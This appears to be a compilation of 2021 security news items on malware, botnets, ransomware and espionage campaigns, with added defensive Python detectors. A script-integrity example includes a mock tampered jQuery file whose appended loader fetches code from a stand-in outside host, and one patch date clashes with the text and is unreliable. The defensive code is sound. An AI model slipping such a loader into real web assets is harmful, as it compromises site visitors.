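The legitimate PrintConfig.dll under System32\spool\drivers passes because it is inside a trusted prefix, which is why the check keys on directory prefix rather than an exact expected path. The watch list is the tuning knob: extend it with whichever system DLL names your environment has seen abused, and the check needs no knowledge of any particular sample.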

VIP72: 15-Year-Old Malware Proxy Network Goes 'Dark' Without Notice



VIP72, a 15-year-old cybercrime anonymity service that let a large number of cybercriminals conceal their real location by routing traffic through dozens of malware-infected computers, abruptly went offline two weeks ago and has shown no sign of returning.

Like other proxy networks advertised on the darknet and on cybercrime forums, VIP72 routed its clients' traffic through malware-infected systems. Using the service, customers could choose network nodes in almost any country to relay their traffic, hiding behind an unsuspecting user's Internet address.

Over the past few days, the darknet has been flooded with "R.I.P." messages for VIP72, which went dark without prior notice. Initially, the operators of VIP72 told customers they would be back online shortly, suggesting a maintenance issue was behind the outage. "Sorry for the inconvenience but we're performing some maintenance at the moment. We'll be back online shortly!" read a notice titled "We'll be back soon!"

It was updated to read, “Socks client will be unavailable within next 5 (FIVE) days for planned upgrades. We will resume normal work of socks client till the end of this week. All active subscriptions will have +8 days to existed paid period.” 

"—We only work on web vip72.com and sellvip72.com/en. Do not access fraudulent websites on google search e.g: vip72.cx, .us etc...", the notice continued, in red lettering.

Set up in 2006, VIP72 had a long run helping malicious actors conceal their real location through a well-established proxy service. By routing their traffic through multiple network hops, the service effectively obscured the identity and true location of malware campaigners; in a nutshell, VIP72 offered its customers protection from law enforcement.

Ironically, however, the U.S.-hosted proxy service itself has presumably run into something serious, perhaps a case of policing. Other experts speculate that VIP72 may have struggled to compete against newly emerged, more sophisticated anonymity services. Although the reason for VIP72's sudden disappearance remains unclear and its website has now been offline for two weeks, the proxy service remains reachable for some users. That makes sense: the compromised hosts are still infected, and they will keep forwarding traffic for as long as the proxy malware remains on them.

To Disseminate Malware, Hackers are Increasingly Relying on DaaS Platforms

 

According to cybersecurity specialists, malware authors increasingly rely on dropper-as-a-service (DaaS) platforms to distribute their creations. Sophos recently published a report detailing the rise of DaaS platforms that infect visitors to piracy websites who are searching for cracked versions of major business and consumer software.

A dropper is a program that, when run, executes malicious code as a payload. A dropper resembles a trojan and may have additional functions, but its primary goal is to get malware onto the victim's computer, either by downloading it over the internet or by unpacking it from data embedded in the dropper itself.

A customer pays a dropper-as-a-service operator to deliver their malware to victims' systems through droppers. Typically, the DaaS uses a network of websites to push droppers onto victims' computers, which then install and execute the customer's malware. Droppers may be disguised as legitimate or cracked software that users are fooled into installing.

“During our recent investigation into an ongoing Raccoon Stealer (an information-stealing malware) campaign, we found that the malware was being distributed by a network of websites acting as a “dropper as a service,” serving up a variety of other malware packages,” Sophos researchers Sean Gallagher and Yusuf Polat wrote in a joint blog post.

The Sophos duo, who were assisted by Anand Ajjan and Andrew Brandt, dubbed this part of the "malware-industrial complex," saying that such services make it "very inexpensive for would-be cybercriminals with limited expertise to get started" in the criminal underworld. For 1,000 malware installs via droppers, some of these services charge as little as $2. 

The researchers point out that DaaS frequently bundles a variety of unrelated malware in a single dropper, including click-fraud bots, information stealers, and even ransomware.

The Raccoon Stealer campaign was not the only one that used DaaS, according to the researchers. Sophos continued to see more malware and other malicious content delivered over the same network of sites even after that campaign had stopped. “We discovered multiple networks using the same basic tactics in our research. All of these networks use search engine optimization to put a “bait” webpage on the first page of results for search engine queries seeking “crack” versions of a variety of software products,” said the researchers.

Hackers are Selling Tool to Hide Malware in GPUs

 

Cybercriminals are moving towards malware that can execute code from a compromised system's graphics processing unit (GPU). The approach is not new, and demo code has been published in the past, but most projects to date have come from academics or were unfinished and unpolished. 

In August, a proof-of-concept (PoC) was sold on a hacker forum, perhaps signalling a shift to a new level of sophistication in such attacks. 

Code Tested on Intel, AMD, and Nvidia GPUs

In a brief post on a hacking forum, someone offered to sell a proof-of-concept (PoC) for a technique that keeps malicious code hidden from security solutions that scan system RAM. The seller gave a brief description of the technique, claiming that it stores malicious code in the GPU memory buffer and executes it from there. 

According to the advertiser, the project only works on Windows PCs that support OpenCL 2.0 and above for executing code on various processors, including GPUs. The seller also stated that they had tested the code on Intel (UHD 620/630), Radeon (RX 5700), and GeForce (GTX 740M(?), GTX 1650) graphics cards. 

Few details about the technique are available, but the post went live on August 8 and was apparently sold for an undisclosed amount on August 25.

Another hacker forum user pointed out that GPU-based malware had been done before, citing JellyFish, a six-year-old proof-of-concept for a Linux-based GPU rootkit. 

The vendor dismissed the comparison with JellyFish, stating that their approach is different and does not rely on mapping code back to userspace. There is no information about the transaction, such as who purchased it or how much they paid; only the seller's post claims the malware was sold to an unidentified third party. 

Academic Study

Researchers at the VX-Underground threat repository stated in a tweet on Sunday that the malicious code allows binary execution by the GPU in its own memory region, and that the technique will be demonstrated soon. 

The researchers who created the JellyFish rootkit also disclosed PoCs for a GPU-based keylogger and a GPU-based remote access trojan for Windows. All three projects were released in May 2015 and are publicly available. 

Although the JellyFish project is the example usually cited, the foundation for this attack approach was laid around eight years ago. 

Researchers from the Institute of Computer Science of the Foundation for Research and Technology (FORTH) in Greece and Columbia University in New York demonstrated in 2013 that GPUs can run a keylogger and store the recorded keystrokes in their own memory space (paper available as a PDF). 

The same researchers had earlier shown that malware authors can use the GPU's processing power to pack code with extremely sophisticated encryption considerably faster than a CPU could.

LockFile Ransomware Circumvents Protection Using Intermittent File Encryption

 

A new ransomware threat known as LockFile has been hitting organisations around the world since July. It surfaced with its own set of tactics for evading ransomware protection, using a technique known as "intermittent encryption." 

The LockFile operators have been found exploiting recently disclosed vulnerabilities such as ProxyShell and PetitPotam to attack Windows servers and install file-encrypting malware that scrambles only every other 16 bytes of a file, allowing it to circumvent ransomware defences. 

Mark Loman, Sophos director of engineering, said in a statement: "Partial encryption is generally used by ransomware operators to speed up the encryption process, and we've seen it implemented by BlackMatter, DarkSide, and LockBit 2.0 ransomware." 

"What sets LockFile apart is that, unlike the others, it doesn't encrypt the first few blocks. Instead, LockFile encrypts every other 16 bytes of a document." 

"This means that a file such as a text document remains partially readable and looks statistically like the original. This trick can be successful against ransomware protection software that relies on inspecting content using statistical analysis to detect encryption," Loman added. 
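To see why a whole-file entropy check misses this trick while a block-wise check does not, here is an added Python example; it is not Sophos' code and contains nothing from LockFile. It constructs a sample text document, uses random bytes as a stand-in for ciphertext (a good cipher's output is statistically indistinguishable from random), replaces either the whole buffer or only every other 16-byte block, and compares two detectors: whole-file Shannon entropy against a typical threshold, and the fraction of 16-byte blocks that no longer look like text. The sample sentence, the 7.5-bit entropy threshold and the 0.6 printable / 0.3 flagged-block ratios are assumptions chosen for the demonstration.

```python
"""Added example: whole-file entropy vs. a block-wise check against
intermittent (every-other-16-bytes) encryption. Sample data is constructed
here; random bytes stand in for ciphertext."""
import math
import random

BLOCK = 16  # granularity Sophos reports for LockFile

# Constructed sample "document": repetitive English text, 2048 bytes (128 blocks).
SENTENCE = b"Quarterly figures were reviewed by the finance team on Monday morning. "
SAMPLE_TEXT = (SENTENCE * 40)[:2048]

# Bytes that plain-text files are made of: printable ASCII plus tab/LF/CR.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the whole buffer (8.0 means uniformly random)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_encrypted_naive(data: bytes, threshold: float = 7.5) -> bool:
    """The check LockFile is designed to slip past: one entropy figure per file."""
    return shannon_entropy(data) >= threshold


def ciphertext_like_fraction(data: bytes, block: int = BLOCK,
                             min_printable: float = 0.6) -> float:
    """Fraction of fixed-size blocks whose printable-ASCII share falls below
    min_printable. Text blocks are ~100% printable; random blocks ~38%."""
    blocks = [data[i:i + block] for i in range(0, len(data), block)]
    if not blocks:
        return 0.0
    flagged = sum(
        1 for blk in blocks
        if sum(1 for b in blk if b in PRINTABLE) / len(blk) < min_printable
    )
    return flagged / len(blocks)


def looks_encrypted_blockwise(data: bytes, max_fraction: float = 0.3) -> bool:
    """Alert when a noticeable share of blocks no longer looks like the file's
    original content, whichever blocks the ransomware chose to touch."""
    return ciphertext_like_fraction(data) > max_fraction


def _random_bytes(n: int, rng: random.Random) -> bytes:
    return bytes(rng.getrandbits(8) for _ in range(n))


def simulate_full_encryption(data: bytes, rng: random.Random) -> bytes:
    """Stand-in for a fully encrypted file: every byte replaced by random data."""
    return _random_bytes(len(data), rng)


def simulate_intermittent_encryption(data: bytes, rng: random.Random,
                                     block: int = BLOCK) -> bytes:
    """Stand-in for LockFile-style output: every other block replaced by random
    data, the blocks in between left as plaintext."""
    out = bytearray(data)
    for start in range(block, len(data), 2 * block):  # blocks 1, 3, 5, ...
        out[start:start + block] = _random_bytes(min(block, len(data) - start), rng)
    return bytes(out)


def run_demo(seed: int = 7) -> dict:
    """Apply both detectors to the three variants and return the results."""
    rng = random.Random(seed)
    variants = {
        "original": SAMPLE_TEXT,
        "full": simulate_full_encryption(SAMPLE_TEXT, rng),
        "intermittent": simulate_intermittent_encryption(SAMPLE_TEXT, rng),
    }
    return {
        name: {
            "entropy": round(shannon_entropy(buf), 2),
            "naive_alert": looks_encrypted_naive(buf),
            "block_fraction": round(ciphertext_like_fraction(buf), 2),
            "blockwise_alert": looks_encrypted_blockwise(buf),
        }
        for name, buf in variants.items()
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:12s} {result}")
```

Running `run_demo()` shows the gap: the fully encrypted buffer scores near 8 bits per byte and trips the naive detector, the intermittently encrypted one lands around 6.9 bits and does not, yet roughly half of its 16-byte blocks fail the printable-text test and the block-wise detector alerts on both. The printable-ASCII heuristic only suits text-like files; for binary formats the same block-wise idea works with a content model appropriate to the format (header magic, expected structure) rather than printable ratio.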

Sophos' LockFile analysis is based on artefacts uploaded to VirusTotal on August 22, 2021. Once installed, the ransomware uses Windows Management Instrumentation (WMI) to terminate critical services associated with virtualisation software and databases before encrypting critical files and objects and displaying a ransom note that closely resembles LockBit 2.0's. 

The ransom note further asks the victim to contact "contact@contipauper.com," which Sophos believes is a jab at a rival ransomware group, Conti. 

Furthermore, after successfully encrypting all of the documents on the machine, the ransomware deletes itself from the system, meaning "there is no ransomware binary for incident responders or antivirus software to identify or clear up." 

Loman warned that the takeaway for defenders is that the cyberthreat landscape never sits still, and adversaries will rapidly grasp any chance or weapon available to conduct a successful attack. 

The disclosures come as the U.S. FBI published a Flash report outlining the tactics of a new Ransomware-as-a-Service (RaaS) group known as Hive, which consists of many actors who use multiple mechanisms to attack business networks, steal data, encrypt data on the networks, and attempt to collect a ransom in exchange for access to the decryption keys.

Phorpiex Malware has Shut Down their Botnet and Put its Source Code for Sale

 

The creators of the Phorpiex malware have shut down their botnet and are selling its source code on a dark web cybercrime forum. The ad, posted on 27 August by an individual previously associated with the botnet's operation, states that neither of the malware's two original authors is still involved in maintaining the botnet, which is why they opted to sell the source code. 

Phorpiex, a long-running botnet notorious for extortion schemes and old-school worms spread via removable USB drives and instant messaging programmes, has been broadening its architecture in recent years in order to become more resilient and deliver more dangerous payloads. 

Its operations, which previously centred on extortion and spamming, expanded to include bitcoin mining. Researchers have also observed an upsurge in data exfiltration and ransomware delivery since 2018, with the bot installer dropping malware such as Avaddon, Knot, BitRansomware (DSoftCrypt/ReadMe), Nemty, GandCrab, and Pony, among others. 

“As I no longer work and my friend has left the biz, I’m here to offer Trik (name from coder) / Phorpiex (name fomr AV firms) source for sell [sic],” the individual said on Friday in a forum post spotted by British security firm Cyjax. 

The ad's legitimacy was confirmed by Alexey Bukhteyev, a malware reverse engineer at security firm Check Point, who analysed Phorpiex in 2019. “The description of the malware is very similar to what we saw in the code,” Bukhteyev said. According to the researcher, the malware's command and control (C&C) servers have been inactive for approximately two months. 

The last command the bot received from the Phorpiex C&C servers came on July 6, 2021, according to Bukhteyev, who has been running a fake Phorpiex bot in order to monitor its operations. The command was a self-explanatory "SelfDeletion" instruction, and the botnet appears to have vanished from open-source reporting since then. 

“As we know, the source code is private and hasn’t been sold before. Therefore, this [forum ad] looks really believable,” Bukhteyev said. “However, we can be totally sure if we buy it. The binaries are quite straightforward, and we can easily confirm that the source code is for this bot indeed, if we get it.”

Even though the botnet's C&C servers are down, Bukhteyev warns that whoever buys the code can set up new ones and take over all of the still-infected systems.

CISA Published MARs on Samples Targeting Pulse Secure Devices

 

This week the US Cybersecurity and Infrastructure Security Agency (CISA) issued five new analysis reports describing malware found on compromised Pulse Secure devices. Adversaries have been targeting Pulse Connect Secure VPN appliances by exploiting a variety of vulnerabilities, including CVE-2021-22893 and CVE-2021-22937, which were disclosed earlier this year.

CISA issued an alert in April this year on attacks against Pulse Secure devices, along with indicators of compromise (IOCs) and details of the malware used by the attackers. The malware analysis reports (MARs) detail the threat actors' tactics, techniques, and procedures (TTPs). 

CVE-2021-22893 is a buffer overflow vulnerability in Pulse Connect Secure Collaboration Suite prior to version 9.1R11.4 that allows remote authenticated attackers to execute arbitrary code as the root user through a maliciously crafted meeting room. Two hacking groups used the zero-day vulnerability in Pulse Secure VPN equipment to break into the networks of US defence contractors and government institutions around the world, according to reports published by FireEye and Pulse Secure in May. 

CVE-2021-22937 is a high-severity remote code execution vulnerability in Pulse Connect Secure's admin web interface. A remote attacker could exploit the weakness to overwrite arbitrary files and gain root-level code execution. The bug has a CVSS score of 9.1 and, according to experts, is the result of a bypass of the patch released in October 2021 to address CVE-2020-8260. Earlier this month, Ivanti fixed a major code execution issue in Pulse Connect Secure VPN. 

According to CISA, two of the samples are maliciously modified Pulse Secure files recovered from compromised machines; both are credential harvesters. One of them also serves as a backdoor, giving attackers remote access to the compromised device. Another file is a malicious shell script that could log usernames and passwords. A third sample consisted of several files, one of which is a shell script for converting a Pulse Secure file into a web shell. One file was designed to intercept certificate-based multi-factor authentication, while others were built to read web request data.

The fifth sample included two Perl scripts designed to execute attacker commands, a Perl library, a Perl script, and a shell script designed to manipulate and execute the 'bin/umount' file.

Joker Virus is Back, Targeting Android Devices

 

The notorious Joker malware has made a comeback, according to Belgian police, who warned that the Joker virus targets only Android smartphones and lurks in numerous apps available on Google's marketplace, the Play Store. 

Joker is among the most tenacious and annoying malware families for Android, capable of infecting people even through the Google Play Store, since it hides inside seemingly harmless apps. It can completely drain a victim's bank account. The 'Joker' trojan belongs to the Bread malware family, whose primary goal is to hijack mobile phone bills and authorise charges without the user's knowledge. 

According to experts at cybersecurity firm Quick Heal Security Lab, the Joker virus can access a user's text messages, contact information, and a variety of other data, which enables it to enrol the victim in premium-rate services. As a result, users risk receiving a large bill from their bank or credit card at the end of the month. 

"This malicious program has been detected in eight Play Store applications that Google has suppressed," stated the Belgian authorities in a statement published on Friday 20th August on their website. 

The 'Joker' malware made headlines in 2017 for attacking and stealing data from its victims while hiding in several applications. Since then, Google Play Store's defences have removed approximately 1,700 apps containing 'Joker' before users could install them. In September 2020, the 'Joker' virus was discovered in 24 Android applications with over 500 thousand downloads before they were taken down. More than 30 countries are believed to have been affected at the time, including the United States, Brazil, and Spain. Hackers could take up to $7 (approximately 140 Mexican pesos) per subscription per week via illicit memberships, an amount that has most likely grown in recent months. 

According to La Razón, the cybersecurity firm Zscaler has publicly revealed the names of 16 other apps that, according to its investigation, also include this dangerous code: Private SMS, Hummingbird PDF Converter - Photo to PDF, Style Photo Collage, Talent Photo Editor - Blur focus, Paper Doc Scanner, All Good PDF Scanner, Care Message, Part Message, Blue Scanner, Direct Messenger, One Sentence Translator - Multifunctional Translator, Mint Leaf Message-Your Private Message, Unique Keyboard - Fancy Fonts & Free Emoticons, Tangram App Lock, Desire Translate and Meticulous Scanner. 

Initially, apps infected with 'Joker' or other malware from this family committed SMS fraud, but they soon began to target electronic payments. Both strategies abuse the integration between telephone operators and service providers that allows services to be paid for through the mobile bill. Both require device authentication but not human verification, allowing the malware to automate transactions without any user participation. 

In addition, it is typical for those affected by 'Joker' to be unaware of the theft unless they study their bank statements carefully. The bank sees nothing unusual in what looks like a 'regular' subscription, and the charges are generally so small that they are not flagged as suspicious activity, so the account holder receives no alert. 

Furthermore, the malicious applications that the Google Play Store removed upon discovering that they carried the 'Joker' virus are as follows: Auxiliary Message, Element Scanner, Fast Magic SMS, Free Cam Scanner, Go Messages, Super Message, Super SMS, and Travel Wallpapers.

ShadowPad Malware is Being Sold Privately to Chinese Espionage

 

Since 2017, five separate Chinese threat groups have used ShadowPad, an infamous Windows backdoor that allows attackers to download additional harmful modules or steal data. In a detailed overview of the malware, SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said that "adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," adding that "some threat groups stopped developing their own backdoors after they gained access to ShadowPad." 

ShadowPad was released in 2015 as a replacement for PlugX. However, it wasn't until several well-known supply-chain incidents – CCleaner, NetSarang, and ShadowHammer – that it began to attract considerable public attention. Unlike the publicly available PlugX, ShadowPad is only available to a select group of people, and an American cybersecurity firm has called it a "masterpiece of privately sold malware in Chinese espionage." 

ShadowPad is a shellcode-based modular backdoor. At execution, an obfuscated shellcode loader decrypts and loads a Root plugin; the Root plugin in turn decrypts and loads the other shellcode-embedded plugins into memory. To date, at least 22 different plugins have been identified. 

Beyond the plugins embedded in a sample, additional plugins can be uploaded remotely from the C&C server, allowing operators to add functionality dynamically. A Delphi-based controller manages the infected machines and is used for backdoor communications, updating the C2 infrastructure, and managing the plugins.

"While ShadowPad is well-designed and highly likely to be produced by an experienced malware developer, both its functionalities and its anti-forensics capabilities are under active development," the researchers said. 

ShadowPad-related attacks have recently targeted Hong Kong-based firms as well as critical infrastructure in India, Pakistan, and other Central Asian countries. Although predominantly attributed to APT41, the implant is known to be shared by multiple Chinese espionage actors, including Tick, RedEcho, RedFoxtrot, and clusters dubbed Operation Redbonus, Redkanku, and Fishmonger. 

"The threat actor behind Fishmonger is now using it and another backdoor called Spyder as their primary backdoors for long-term monitoring, while they distribute other first-stage backdoors for initial infections including FunnySwitch, BIOPASS RAT, and Cobalt Strike," the researchers said. "The victims include universities, governments, media sector companies, technology companies and health organizations conducting COVID-19 research in Hong Kong, Taiwan, India and the U.S."

Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware

 

A North Korean threat actor has been found exploiting two Internet Explorer flaws to target individuals with a custom implant, compromising a South Korean online daily newspaper as part of a strategic web compromise (SWC). 

Cybersecurity firm Volexity attributed the attacks to a threat actor it tracks as InkySquid, better known by the monikers ScarCruft and APT37, a well-known North Korean hacking group. Daily NK, the publication in question, is believed to have hosted the malicious code from at least the end of March 2021 until early June 2021. 

InkySquid, the infamous North Korean hacker group, has been leveraging the vulnerability since 2020 to plant malicious JavaScript code hidden within a site's legitimate code in attacks against Internet Explorer users. 

In April this year, Volexity identified suspicious code loaded via www.dailynk[.]com from attacker-controlled jquery[.]services subdomains. The code was served from two URLs:

  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 

Volexity notes that the "clever disguise of exploit code amongst legitimate code", together with the use of bespoke malware, allows the attackers to evade detection. 

The attacks involved modifying the jQuery JavaScript libraries on the website so that they fetched further obfuscated code from a remote URL, which in turn exploited two Internet Explorer vulnerabilities that Microsoft patched in August 2020 and March 2021. A Cobalt Strike stager and a new backdoor named BLUELIGHT were deployed this way. 

  • CVE-2020-1380 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability 
  • CVE-2021-26411 (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability 
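A defender's counterpart to the tampering described above, as an added Python example that is neither Volexity's code nor anything from the Daily NK site: pin the hash of each first-party script from a trusted copy, verify what the server actually serves against it, and flag any absolute URL in the script that points outside an allowlist of expected hosts. The "pristine" jQuery stand-in, the tampered copy, the hostname static.jquery-assets.example and the allowlist are all constructed for this demonstration. Because the real injected code was buried inside the site's genuine jQuery files, the unexpected-host check complements the hash check rather than replacing it.

```python
"""Added example: detect a modified first-party script (as in the Daily NK
compromise) by hash pinning plus an allowlist of hosts it may reference.
All sample data below is constructed for the demonstration."""
import base64
import hashlib
import re

# Constructed stand-in for a pristine first-party asset; it is NOT the real jQuery.
PRISTINE_JQUERY = (
    b"/*! jQuery v3.5.1 stand-in (constructed) | jquery.org/license */\n"
    b"(function(w){w.$=w.jQuery=function(sel){return sel;};})(window);\n"
)

# Constructed stand-in for the tampered copy: the genuine code is intact, but a
# short loader appended at the end pulls further code from an outside host.
# (Stand-in domain; the real attack used jquery[.]services subdomains.)
TAMPERED_JQUERY = PRISTINE_JQUERY + (
    b"(function(d){var s=d.createElement('script');"
    b"s.src='https://static.jquery-assets.example/jquery.min.js';"
    b"d.head.appendChild(s);})(document);\n"
)

# Recorded once, from a trusted copy, when the site was deployed (assumption).
PINNED_SHA256 = hashlib.sha256(PRISTINE_JQUERY).hexdigest()

# Hosts a first-party script on this site is expected to reference (assumption).
ALLOWED_HOSTS = {"www.dailynk.example", "cdn.dailynk.example"}

# Absolute URLs embedded in script text; group 1 is the host.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def integrity_ok(served: bytes, pinned_sha256: str) -> bool:
    """True only if the served bytes match the pinned hash exactly."""
    return sha256_hex(served) == pinned_sha256.lower()


def referenced_hosts(script: bytes) -> set:
    """Every host named by an absolute http(s) URL inside the script."""
    text = script.decode("utf-8", errors="replace")
    return {m.group(1).lower() for m in URL_RE.finditer(text)}


def unexpected_hosts(script: bytes, allowed: set) -> list:
    """Hosts referenced by the script that are not on the allowlist, sorted."""
    return sorted(referenced_hosts(script) - {h.lower() for h in allowed})


def sri_attribute(data: bytes) -> str:
    """Subresource Integrity value for a <script integrity=...> attribute, so a
    browser refuses a copy of this asset that no longer matches."""
    digest = hashlib.sha256(data).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def audit_asset(served: bytes, pinned_sha256: str, allowed: set) -> dict:
    """Combine both checks; a monitoring job would run this on each fetch."""
    return {
        "integrity_ok": integrity_ok(served, pinned_sha256),
        "unexpected_hosts": unexpected_hosts(served, allowed),
    }


if __name__ == "__main__":
    for label, blob in (("pristine", PRISTINE_JQUERY), ("tampered", TAMPERED_JQUERY)):
        print(label, audit_asset(blob, PINNED_SHA256, ALLOWED_HOSTS))
    print("SRI for pristine copy:", sri_attribute(PRISTINE_JQUERY))
```

In practice the pinned hashes live outside the web server (so an attacker who can edit the served files cannot also edit the reference), the audit job fetches each asset over the public path the way a visitor would, and any integrity failure is treated as an incident, not just re-pinned. The `sri_attribute` helper produces the value for a `<script integrity="...">` attribute; it protects assets loaded from a CDN, but it does not help when the attacker can edit both the HTML and the script on the same origin, which is why the server-side hash check comes first.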

Both vulnerabilities were previously exploited in the wild by North Korean hackers to target security researchers working on vulnerability research and development, in an operation uncovered earlier in January. 

Once the Cobalt Strike stager is in place, BLUELIGHT is deployed as a secondary payload: a full-featured remote access trojan that gives the operators complete control over the affected system. 

Along with collecting system metadata and antivirus product information, the malware can execute shellcode, harvest cookies and credentials from Internet Explorer, Microsoft Edge, and Google Chrome, retrieve files, and run arbitrary commands whose results are exfiltrated to a remote server.

Flubot Malware Targets Australians, Spreads Via SMS

 

Misleading SMS messages and phantom missed-call notifications are hitting smartphones in a new wave of scams across Australia, including one that claims to deliver a friend's voice message but instead delivers malware that can harvest personal information. The latest SMS scam, known as Flubot, has reached thousands of Australians and attempts to plant malicious software on their smartphones. 

Although iPhone users may receive the messages too, Flubot is malware that targets Android users. It informs the recipient of a missed call or a new voicemail and provides a bogus link to listen to the message. The link leads to a website imitating a well-known brand (Telstra in Australia, for example, or a parcel-delivery company in Europe) that asks the user to install an app in order to listen to the voicemail. 

If the user agrees, the malware is downloaded. If the application is granted the permissions it requests, the attacker gains access to payment card details and private information, can intercept SMS messages and monitor browsing, and can collect other data stored on the phone. The malware also lets the attacker read the victim's contact list to find new targets. 

Manual removal is possible, but Telstra has recommended that affected users factory-reset the device and restore it from a backup taken before the malware was installed. 

Flubot first hit Europe earlier this year, before Australians started being inundated with it this month. The Australian Competition and Consumer Commission told Guardian Australia that its Scamwatch service has received over 3,700 reports of this scam since the first report on 4 August. Scamwatch received 413 reports a day about all SMS-related scams, including Flubot, between 4 and 17 August, compared with the 122 received between 1 July and 3 August. 

Delia Rickard, deputy chair of the Australian Competition and Consumer Commission said, “It is flooding the country and it is a really dangerous one.” “We’ve just had one complaint about an instance where the person lost nearly $5000. It appears that the malware has created a fake Google Pay login screen, and the person logged in and then the money disappeared from their account afterward.” 

The payoff for the fraudsters is cash or personal data, which may then be sold on the dark web. Flubot is only one of many scams in what has been the pandemic's boom year for hackers and cyber thieves: Australians lost almost $850 million to cyber criminals last year, according to the ACCC. 

Telstra’s deputy chief information security officer, Clive Reeves, said last week the company was “working with the security community to address this scam”. 

An Optus spokesman said the company has started contacting affected customers. The telco also recommended McAfee Wi-Fi Secure antivirus software to protect customers on wifi connections. 

A spokeswoman for TPG, which operates the Vodafone brand in Australia, said last week that the company had blocked over 14 million scam SMS messages, including Flubot. “As scammers constantly morph their tactics, we continually update our filters and mechanisms to catch new scams,” the spokeswoman said.